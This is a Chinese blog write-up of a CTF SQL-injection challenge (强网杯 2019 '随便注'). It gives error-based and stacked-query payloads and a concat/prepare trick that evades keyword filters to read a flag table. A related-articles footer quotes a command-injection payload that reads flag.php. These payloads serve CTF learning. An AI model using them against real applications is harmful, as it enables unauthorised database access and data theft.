首页 > 其他分享 >[强网杯 2019]随便注

[强网杯 2019]随便注

时间:2024-11-11 19:57:36浏览次数:1  
标签:回显 show stmt 随便 强网杯 2019 sql 报错 concat


输入1',发现报错,且闭合符号为单引号

那么我们可以尝试报错注入,先用order by确认回显列数。这里回显列数为2
用union确认回显位置,1 union select 1,2,发现这些字符被过滤了,尝试了大小写也不行,直接猜吧。

这里可以用报错注入,1' and (extractvalue(1,concat(0x7e,database(),0x7e)));#,得到当前数据库为supersqli

之后使用堆叠注入执行命令行查询数据库,表,列等等。得到flag在supersqli的1919810931114514表里,payload如下:

1';show databases;
1';show tables from supersqli;
1';show columns from `1919810931114514`;


根据前面我们知道,select关键词被过滤了,大小写也是不行的哦。这里我们可以使用预编译结合concat函数将语句合并,实现执行查询

-1';set @sql=concat('sel','ect 1,2');prepare stmt from @sql;execute stmt


发现有关键词匹配,不能有set和prepare,这个可以使用大小写绕过。

-1'; sEt @sql=concat('sel','ect * from `1919810931114514`;');Prepare stmt from @sql;execute stmt;#

得到flag

标签:回显,show,stmt,随便,强网杯,2019,sql,报错,concat
From: https://www.cnblogs.com/abenben/p/18540450

相关文章

  • [GXYCTF2019]Ping Ping Ping
    打开页面如下:按提示输入ip127.0.0.1尝试加管道符,查看目录结构,?ip=127.0.0.1|lscat查看flag.php他骂我们,说空格不行。使用其他字符替换空格,?ip=127.0.0.1|cat$IFS$9flag.php又骂我们,说flag字符串不行,我们先看看index.php,直接审计代码看看怎么绕过,?ip=127.0.0.1|cat$IFS$......
  • 重温c语言之,7天开整,就是随便的写写,第十天
    一:操作符&:按位与----2进制|:按位或----2进制^:按位异或----2进制~:按位取反---2进制&:先上代码,然后解释1#define_CRT_SECURE_NO_WARNINGS23#include<stdio.h>4intmain()5{6inta=3;7intb=-5;8intc=a&......
  • [SUCTF 2019]EasySQL
    当输入数字时返回array结构,且任意非0数字都是返回1。当输入字符串时无任何回显。那么我们可以猜测sql语句中存在逻辑或符号||,因为任意非0在mysql中相当于true且返回值为1,而字符及字符串会被当作变量处理,或运算时会报错。那么绕过的方法是将mysql的sql_mode参数设置为PIPES_AS_CO......
  • [极客大挑战 2019]EasySQL
    网站首页解题思路正常登录看看情况,输入用户名admin,密码随意,先找闭合,输入用户名admin',得到不一样的报错得知闭合符号为单引号。由于我们不知道用户名,可以尝试用or1绕过输入用户名,即用户名输入admin'or1,登录得到flag{d039ca08-d6de-4b03-b876-c2b86d85fa12}......
  • 重温c语言之,7天开整,就是随便的写写,第九天
    这次照着网站上的内容,写了一个简单的小游戏,3字棋,其实也可以n字棋附上代码,这里是:game.h1#pragmaonce2#include<stdio.h>3#include<stdlib.h>4#include<time.h>56//游戏代码的声明(函数声明,符号定义)78#defineRow39#defineCol31011//初始化棋......
  • [GXYCTF2019]BabySQli
    题目链接:[GXYCTF2019]BabySQli。个人认为这道题是脑洞题(当然也跟基础业务知识不够有关)。打开题目后环境如下。只有一个登录框,因此常规操作,先测试一下看看。通过多次输入不同的UserName、password发现,存在admin用户,并且可以遍历UserName。接下来尝试注入,发现似乎只有......
  • [CISCN2019 华北赛区 Day2 Web1]Hack World
    题目链接:[CISCN2019华北赛区Day2Web1]HackWorld。打开环境后如下所示。尝试输入1、2、3、4、...,发现仅存在三种结果。即1时,输出"Hello,glzjinwantsagirlfriend."。2时,输出"Doyouwanttobemygirlfriend?"。其他,输出"ErrorOccuredWhenFetchResult."。......
  • 历年CSP-J初赛真题解析 | 2019年CSP-J初赛完善程序(34-43)
    学习C++从娃娃抓起!记录下CSP-J备考学习过程中的题目,记录每一个瞬间。附上汇总贴:历年CSP-J初赛真题解析|汇总_热爱编程的通信人的博客-CSDN博客矩阵变幻有一个奇幻的矩阵,在不停的变幻,其变幻方式为:数字0变成矩阵[......
  • [CISCN2019 华北赛区 Day2 Web1]Hack World 1
    [CISCN2019华北赛区Day2Web1]HackWorld1打开实例发现是个POST注入框盲猜SQL注入,万能密码检测无果,而且经过测试存在大量sql关键字过滤尝试使用(),出现了bool(false),确定这是一道布尔注入题and被禁用,决定采用异或^注入构建payload脚本梭哈:成功获得flag:flag{a2f7089......
  • [GWCTF 2019]babyRSA
    fromCrypto.Util.numberimport*fromgmpy2import*fromsympyimport*p=797862863902421984951231350430312260517773269684958456342860983236184129602390919026048496119757187702076499551310794177917920137646835888862706126924088411570997141257159563952......